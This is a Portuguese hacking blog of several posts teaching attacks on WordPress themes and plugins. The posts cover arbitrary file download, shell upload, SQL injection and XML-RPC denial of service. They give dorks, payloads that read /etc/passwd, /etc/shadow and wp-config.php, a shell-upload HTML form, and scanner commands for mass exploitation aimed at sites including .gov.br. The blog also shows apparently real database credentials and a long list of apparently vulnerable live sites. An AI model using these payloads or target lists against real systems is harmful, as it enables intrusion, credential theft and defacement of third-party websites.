Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador wordpress. Mostrar todas as postagens
Mostrando postagens com marcador wordpress. Mostrar todas as postagens

terça-feira, 23 de dezembro de 2014

Tutorial/Video EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

TUTORIAL ::: E X P L O I T 

$MASS_EXPLOIT = ($Script_Exploit +  $SCANNER_INURLBR);

EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

--------------------------------------------------------------------------------------------------------------
# NAME:::::::: Wordpress A.F.D Theme Echelon
# TIPE:::::::: Arbitrary File Download

# Google DORK: inurl:/wp-content/themes/echelon
# Vendor:::::: www.wordpress.org
# Tested on::: Linux

# EXECUTE::::: php exploit.php www.alvo.com.br
# OUTPUT:::::: EXPLOIT_WPAFD_Echelon.txt
--------------------------------------------------------------------------------------------------------------

EXPLOIT::: 
DOWNLOAD::
LINK[0]::: http://pastebin.com/14uVQyUV
LINK[1]::: http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
--------------------------------------------------------------------------------------------------------------

USE::::::: MASS / USE SCANNER INURLBR
DOWNLOAD::
LINK[0]::: https://github.com/googleinurl/SCANNER-INURLBR
--------------------------------------------------------------------------------------------------------------

COMAND EXEC SCANNER INURLBR / comando de uso....
./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --command-all "php exploit.php _TARGET_"
--------------------------------------------------------------------------------------------------------------

Arquivos que o EXPLOIT verifica::

File download /etc/passwd & /etc/shadow

Failure consists of exploring a parameter $ _POST file

{alvo_target}/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
*REQUEST POST:*
_mysite_download_skin={$config['file']}&submit=Download 
ex:
 _mysite_download_skin=/etc/passwd&submit=Download

[Vídeo]
#-------------------------------------------------------------------
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE:  https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#-------------------------------------------------------------------



terça-feira, 16 de dezembro de 2014

Wordpress A.F.D Theme Echelon Explorando tema wordpress falha Arbitrary File Download

EXPLOIT Wordpress A.F.D Theme Echelon
EXPLOIT Wordpress A.F.D Theme Echelon Explorando tema Echelon do wordpress falha Arbitrary File Download
Explorando tema Echelon do wordpress falha Arbitrary File Download

# NAME:         Wordpress A.F.D Theme Echelon
# TIPE:         Arbitrary File Download
# Vendor:       www.wordpress.org
# Tested on:    Linux
# EXECUTE:      php exploit.php www.alvo.com.br
# OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA

Pois bem já que o 1337day não publicou o script posto aqui, "alias tem muito bla bla pra preeche odeio" rsrs.

A falha consista em explorar um um parâmetro $_POST do arquivo
/wp-content/themes/echelon/lib/scripts/dl-skin.php

Os seguintes campos são explorados para o Arbitrary File Download
Via POST:
_mysite_download_skin={$config['file']}&submit=Download
Ex:
_mysite_download_skin=/etc/passwd&submit=Download

Sem os devidos filtros podemos ter acesso a arquivos internos do servidor alvo.
Para tal validação desenvolvi um exploit pra validar tais valores expotos pelo /etc/passwd e  /etc/ shadow encontrando padrão baseado na seguintes expressões regulares:
------------------------------------------------------------------------------------------------
    preg_match_all("(root:.*)", $rest['corpo'], $final);
    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
------------------------------------------------------------------------------------------------

Exploração:

Baixar Exploit: http://pastebin.com/14uVQyUV / http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
Modo de executar:
php exploit.php http://alvo
Resultado:
php exploit.php http://alvo


Agora vamos usar tal exploit junto com SCANNER INURLBR assim transformando o mesmo em um explorador massivo... EXPLORING MASS! EXPLORING MASS!

Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

Comando de execução:
./inurlbr.php --dork '[DORK]inurl:/wp-content/themes/echelon[DORK]"index of" /themes/echelon' -q 1,6 -s save.txt --comand-all "php exploitAFD.php _TARGET_"

Explicando comando:

--dork vai definir código avançado de busca google.
[DORK] é uma expressão usada dentro do parâmetro --dork que possibilita usar varias dorks em uma só analise.
-s salvar alguns sites vulns caso o scanner encontre.
-q define motores de busca a serem usados.
--comand-all executa comando no terminal para cada alvo encontrado.
para mais informações sobre --comand consulte o help do script.
Ajuda:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Resultado execução:
 Agora vamos usar tal exploit junto com SCANNER INURLBR assim transformando o mesmo em um explorador massivo... EXPLORING MASS! EXPLORING MASS!


Pesquisa dork:
DORK: inurl:/wp-content/themes/echelon
DORK: "index of" /themes/echelon

Baixar Exploit: http://pastebin.com/14uVQyUV
Ajuda: https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
Baixar INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

quinta-feira, 27 de novembro de 2014

Explorando Slider Revolution/Showbiz Pro Shell Upload Exploit

Explorando Slider Revolution/Showbiz Pro Shell Upload Exploit

0x===> Slider Revolution/Showbiz Pro Shell Upload Exploit

Bom vamos lá novamente surge um bug critico em um plugin do Wordpress novamente o plugin afetado é o Slider Revolution estima-se que atualmente ele seja o plugin para slider.

[INFO INTERNA DO EXPLOIT]{
Além da vulnerabilidade LFI recentemente que foi publicado há alguns meses, esta é uma outra vulnerabilidade que os desenvolvedores não corrigiram.
Decidiram disponibilizar sem liberar um boletim de segurança completo, deixando milhares de usuários revslider que não atualizam o seu plugin para a versão mais recente (=> 3.0.96) vulnerável a esta falha desagradável, revsliders desenvolvedores irão argumentar o fato de que seu controle vem com um recurso de atualização automática, mas o problema é que este plugin é empacotado com um monte de temas, o que significa que esses temas os usuários podem não conseguir as devidas atualizações de plugins ou terá que pagar para obter a atualização. Em outras palavras desenvolvedores da revslider acredito que cada usuário deve ter o recurso de atualização automática, caso contrário ... você está ferrado.
 Obviamente, isso é muito mais importante do que a vulnerabilidade LFI, pois permite o acesso shell dando atacantes acesso ao sistema de destino bem como a capacidade para despejar todo o banco de dados wordpress localmente.
Dito isto, deve-se atualizar imediatamente para a versão mais recente ou desativar / switch para outro plugin.
Quanto Showbiz Pro, infelizmente a vulnerabilidade nunca foi criado um patched como foi explorada com sucesso na última versão (1.7.1)
}

Download:
Exploit:

Exploit update zip files:

Dependências de para uso:
Requires LWP::UserAgent
apt-get install libwww-perl
yum install libwww-perl
perl -MCPAN -e 'install Bundle::LWP'

For SSL support:
apt-get install liblwp-protocol-https-perl
yum install perl-Crypt-SSLeay

Começando a exploração

Primeiro baixaremos o exploit http://1337day.com/exploit/22938
No código do exploit encontramos dois zip's citados acima para baixar:

Exploit update zip files: http://www.morxploit.com/morxploits/revslider.zip http://www.morxploit.com/morxploits/showbiz.zip


Fazemos o download dos arquivos na mesma pasta em que o exploit.pl esteja alocado.
Mãos a obra 

0x Comando / Demo: 
  1. perl exploit.pl <target> <plugin>
  2. perl exploit.pl http://localhost revslider
  3. perl exploit.pl http://localhost showbiz
  4. perl exploit.pl http://localhost revslider



A primeira forma de explorar essa falha é pegando acesso via terminal nos dando acesso a pasta
"wp-content/plugins/__PLUGIN__/temp/update_extract/__PLUGIN__/"
 (os locais com __PLUGIN__ é o nome do plugin escolhido),
 Depois de tal processo se foi executado com sucesso apos isso é temos acesso ao terminal shell da maquina vulnerável, assim executando comandos como id,ls,wget entre outros.

A segunda maneira que o exploit nos permite obter acesso é por meio de uma webshell que fica alocada em "wp-content/plugins/__PLUGIN__/temp/update_extract/temp.php".

DORK[0] site:.gov.br inurl:/temp/update_extract/ revslider
DORK[1] site:.br inurl:/temp/update_extract/ revslider
DORK[2] site:.br inurl:/temp/update_extract/

Comando compatível com SCANNER INURLBR

./inurlbr.php --dork 'site:.gov.br inurl:/temp/update_extract/' -s wordpress.txt -q 1,6 --comand-all 'perl exploitWordpressSlide.pl http://_TARGET_ revslider'


Comando compatível com SCANNER INURLBR:   ./inurlbr.php --dork 'site:.gov.br inurl:/temp/update_extract/' -s wordpress.txt -q 1,6 --comand-all 'perl exploitWordpressSlide.pl http://_TARGET_ revslider'

OBS: Para usar tal exploits junto ao scanner inurlbr deve-se modificar tal scritp em seu banner retirando a linha 140 que contem um limpador de tela.
line 140: system(($^O eq 'MSWin32') ? 'cls' : 'clear'); 

SCANNER INURLBR BAIXAR:
https://github.com/googleinurl/SCANNER-INURLBR

quarta-feira, 27 de agosto de 2014

WordPress Plugin KenBurner Slider LFD

[0x01] Dando continuidade aos pequenos bugs e grande dores de cabeças do WordPress novamente uma falha de LFD em um plugin usado por muitos sites todavia o afetado dessa vez é o KenBurner Slide a falha é bem semelhante ao do revslider na realidade é a mesma apenas mudando o alvo. Bom vamos la



[0x01] Dando continuidade aos pequenos bugs e grande dores de cabeças do WordPress novamente uma falha de LFD em um plugin usado por muitos sites todavia o afetado dessa vez é o KenBurner Slide a falha é bem semelhante ao do revslider na realidade é a mesma apenas mudando o alvo.
Bom vamos la



[0x02] Explorando com o Scanner inurlbr
Dork Index of /wp-content/plugins/kbslider

Comando

"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "

Resultado e novamente lhe retornara o wp-config.php contendo as infos do mysql do alvo
"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "



SCRIPT SCANNER INURLBR=> https://github.com/googleinurl/SCANNER-INURLBR
DD

quinta-feira, 7 de agosto de 2014

WordPress e Drupal vulnerabilidade de negação de serviço

WordPress e Drupal vulnerabilidade de negação de serviço

Uma recente falha nos CMS's Wordpress e Drupal, que permitem  negação de serviço XML foi publicada no blog www.breaksec.com.

Também na página oficial do wordpress voltada para suporte, foi recebido o seguinte post:
WordPress › Support » Plugins and Hacks
iThemes Security (formerly Better WP Security)
Warning: XMLRPC WordPress Exploit DDOS (2 posts)
http://wordpress.org/support/topic/warning-xmlrpc-wordpress-exploit-ddos

Opção Padrão WordPress Inseguro = Very Large Botnet de DDOS / Mais de 162.000 afetados até o momento. 
DDOS = ataque de negação de serviço-, destina-se a pedidos completos e sobrecarga para o servidor, até que o tráfego real acaba sendo bloqueado ou as falhas do servidor. 

O XML-RPC é um protocolo de chamada de procedimento remoto (CPR) que utiliza XML para codificar suas chamadas e HTTP como um mecanismo de transporte. É um protocolo simples, definido com poucas linhas de códigos em oposição com a maioria dos sistemas de RPC, onde os documentos padrões são freqüentemente com milhares de páginas e exige apoio de softwares para serem usados.

Qualquer site WordPress com Pingback habilitado (que é ativado por padrão) podem ser usados ​​em ataques DDoS contra outros sites. Note-se que XMLRPC é usado para pingbacks, trackbacks, acesso remoto via dispositivos móveis e muitos outros recursos. Assim, você pode usá-lo para um bom propósito.

A vulnerabilidade afeta WordPress 3.5 a 3.9.1 e Drupal 6.x e 7.x., O ataque pode deixar o servidor fora de serviços em questão de segundos ou minutos.
Foi desenvolvido um exploit que explorar ataques XML com Negação de serviço, Tal ataque é diferente dos demais processos de exploração XML Bomb, no sentido que o mesmo distorce o limite de memória e MySQL, Apache Max Clients works . Para utilizar tal bug não tem necessidade ou auxilio de nem plugin, pois é uma falha padrão já instalada do WordPress e Drupal.  

Riscos da situação atual::::
- Serviço não disponível (muitas conexões abertas, mysql_connect(): Muitas conexões em aberto) 

- WORDPRESS
- Serviço não disponível (muitas conexões abertas, mysql_connect(): Muitas conexões em aberto)

- DRUPAL
- Serviço não disponível (muitas conexões abertas, mysql_connect(): Muitas conexões em aberto)


- 100% CPU, RAM Usage
- 100% CPU, RAM Usage


Sobre Ataque XML Quadratic Blowup: Um XML quadrática ataque blowup é semelhante a um Billion Laughs attack:
O que seria um Billion Laughs attack: Em sec, um ataque Billion Laughs é um tipo de (DoS) ataques denial-of-service, que visa analisadores de documentos XML. [1] 
É também referido como uma XML bomb  ou como um ataque de expansão entidade exponencial [2].

Vídeo demostrativo do ataque:


EXPLOIT: http://pastebin.com/5HpJGiZL

REF:
http://www.breaksec.com/?p=6362
https://en.wikipedia.org/wiki/Billion_laughs
https://httpd.apache.org/docs/current/mod/mpm_common.html
http://php.net/manual/en/ini.core.php
https://en.wikipedia.org/wiki/Document_type_definition
http://wordpress.org/news/2014/08/wordpress-3-9-2/

terça-feira, 5 de agosto de 2014

Wordpress Lead-Octopus-Power plugin SQL INJECTION


                             0x Wordpress Lead-Octopus-Power plugin SQL INJECTION

Seguindo a serie de como não cria uma cms ops digo de como pequenos bugs em grandes cms são extremamente perigosos e a cada dia acabam se tornando mais comum sendo na própria cms ou em Plugins como ocorre no WordPress ou component que ocorre no Joomla.
Bom vamos la mais uma vez um bug no WordPress explorando SQL INJECTION dessa vez em um plugin vamos ao POC da vulnerabilidade para podemos encontra sites com esse bug usaremos a seguinte 

Dork inurl:wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=  

A falha fica localizada em

site.gov.br/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=[SQL]

WordPress CopySafe PDF Protection 0.6 Shell Upload


0x WordPress CopySafe PDF Protection 0.6 Shell Upload

Continuando a serie de bugs voltados para o famoso wordpress dessa vez apresentamos um dos mais estúpidos que podem existir, esse bug possibilita o defacer fazer o upload de uma shell sem trabalho algum.
A vulnerabilidade fica alocada em lib/uploadify/uploadify.php com isso permite o upload de uma shell sem trabalho algum apos o upload a shell se aloca em http://site.gov.br/wp-content/uploads/shell.php
Bom mas vamos ao codigo do exploit que devera ser salvo como xpl.html no seu pc :)

  1. <form
  2. action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
  3. method="post"
  4. enctype="multipart/form-data">
  5. <label for="file">Filename:</label>
  6. <input type="file" name="wpcsp_file" ><br>
  7. <input type=text name="upload_path" value="../../../../uploads/">
  8. <input type="submit" name="submit" value="Submit">
  9. </form>




WordPress BSK PDF Manager 1.3.2 SQL Injection

WordPress BSK PDF Manager 1.3.2 SQL Injection

0x WordPress BSK PDF Manager 1.3.2 SQL Injection

O plug-in ajuda a gerenciar seus documentos PDF em WordPress. Você pode enviar por categorias e exibição caregories ou mostrar um documento especial PDF.
É fácil de utilizar. Você só precisa copiar os códigos de acesso para a página / post onde você quer mostrar. Em seguida, ele irá mostrar o link na sua página / post.
Widget é suportado agora! Você pode mostrar a lista de PDFs em uma área de widget.
Código vulnerável

  1. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
  2. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $categories_curr_view = trim($_GET['view']);
  3. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['categoryid']) && $_GET['categoryid']){
  4. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $category_id = trim($_GET['categoryid']);
  5. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
  6. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $lists_curr_view = trim($_GET['view']);
  7. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['pdfid']) && $_GET['pdfid']){
  8. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $pdf_id = trim($_GET['pdfid']);
  9. $category_id = trim($_GET['categoryid']);
  10. $pdf_id = trim($_GET['pdfid']);

                                               0x Exploração via Browser e sqmlap

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2


sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid




segunda-feira, 4 de agosto de 2014

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


0x Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


Slider Revolution Responsive é um plugin do wordpress muito utilizado hoje em dia por sites que abortam diversos temas variando de sites governamentais ate mesmo sites de lojas uma falha que aos olhos de muitos poderia ser algo banal acabou virando uma grande dor de cabeça.
O bug permite a download do arquivo wp-config entre outros, no wp-config contem

  1. define('DB_NAME', 'lojaphos'); Nome do banco de dados
  2. define('DB_USER', 'lojaphos'); Usuário relativo ao banco que contem o Wordpress
  3. define('DB_PASSWORD', 'silva2805'); Senha do banco
  4. define('DB_HOST', 'mysql.phosloja.com.br'); normalmente estará como localhost
 0x Explorando 

            Dork revslider.php "index of"
            http://site.alvo/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.
Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.

 No vídeo abaixo demostra a exploração com o inurlbr
                                                                   

terça-feira, 10 de junho de 2014

Exploit Participants Database <= 1.5.4.8 Wordpress

0xParticipants Database
Wordpress Participants Database 1.5.4.8 - SQL Injection

É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas.

É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas. 
Participants Database Wordpress Participants Database 1.5.4.8 - SQL Injection

- Detalhes sobre a Vulnerabilidade 

1.Devido ao privilégio insuficiente verifica que é possível para anonymous(unauthenticated) para desencadear algumas ações administrativas, se algum dos códigos de acesso é utilizado (por exemplo, inscrição de página).

2. A ação "export CSV" tem um parâmetro chamado "query" que pode conter uma consulta SQL arbitrária. 
Isso significa que um usuário não autenticado pode executar instruções SQL arbitrários (por exemplo, criar um usuário administrador, ler ou escrever arquivos ou executar código dependendo dos privilégios de usuário do MySQL).  

----------------------------------------------------------------------------------------------------------------------------------
0xEXPLOIT:
http://www.exploit-db.com/exploits/33613/


0xDORK[0]:"Index of" "/wp-content/uploads/participants-database"
0xDORK[1]:inurl:"pdb-signup/" "PDB signup"
0xDORK[2]:inurl:"pdb-signup/" intitle:"PDB signup "
----------------------------------------------------------------------------------------------------------------------------------
DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => %22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => Index of /wp-content/uploads/participants-database
    [cmd] => ping -c 1 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=%22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22&num=1900&btnG=Search
    [port] => 80
)






RESULTADO PARCIAL:


http://webcache.googleusercontent.com/search?q=cache:kUL3synKmD0J:http://ebookily.org/xls/gassendi%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:WuVzKwF26PUJ:http://ebookily.org/xls/kathak-dress%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:OZ9vR__pkOgJ:http://www.tag.ubc.ca/iswnetwork.ca/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:MS8BxtAMxoAJ:http://www.shreeyashmatrimonial.com/kiran/d/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:l8rmzvOyZOkJ:http://www.younguttarakhand.org/wp/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:t43d046zpLQJ:http://partycrewgh.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:3kQuvZzwr6EJ:http://top3crew.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:gpBnRGnjbxcJ:http://sdara.com/sdarawebsite/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nHBeHM57ojEJ:http://qsaudi.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:8yfwjuM8apgJ:http://www.blc-denver2.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:1uEWo4ctyKYJ:http://www.csa.us/www/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:G64f413f7V4J:http://www.gcm73.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:vSoBRrZja70J:http://www.powercollaborative.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:VyTtsWKYn2gJ:http://cccc-houston.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:BAh_697eT80J:http://www.mjbandofgold.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:Luc-zFtM2nEJ:http://www.gapfootball.org.au/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:R6DbMAITjosJ:http://www.4k-nn.ru/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:1ZHqjROYqJ8J:http://www.bcscpa.com/bcs-blog/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:-4lNmZAQJTYJ:http://graceland4kids.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:seg55mSkGSoJ:http://emeraldtigers.com.au/new_2013_website/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nR8gLIEbCOEJ:http://artisanwineclub.com/index/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:cn3Yz66lQ-AJ:http://www.dsnyfamily.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:7W_fZ-33EVQJ:http://promovgroup.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:KT4lO7pNnswJ:http://www.rebbepiper.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:oujptjZTnnMJ:http://www.firt2013barcelona.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saror
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
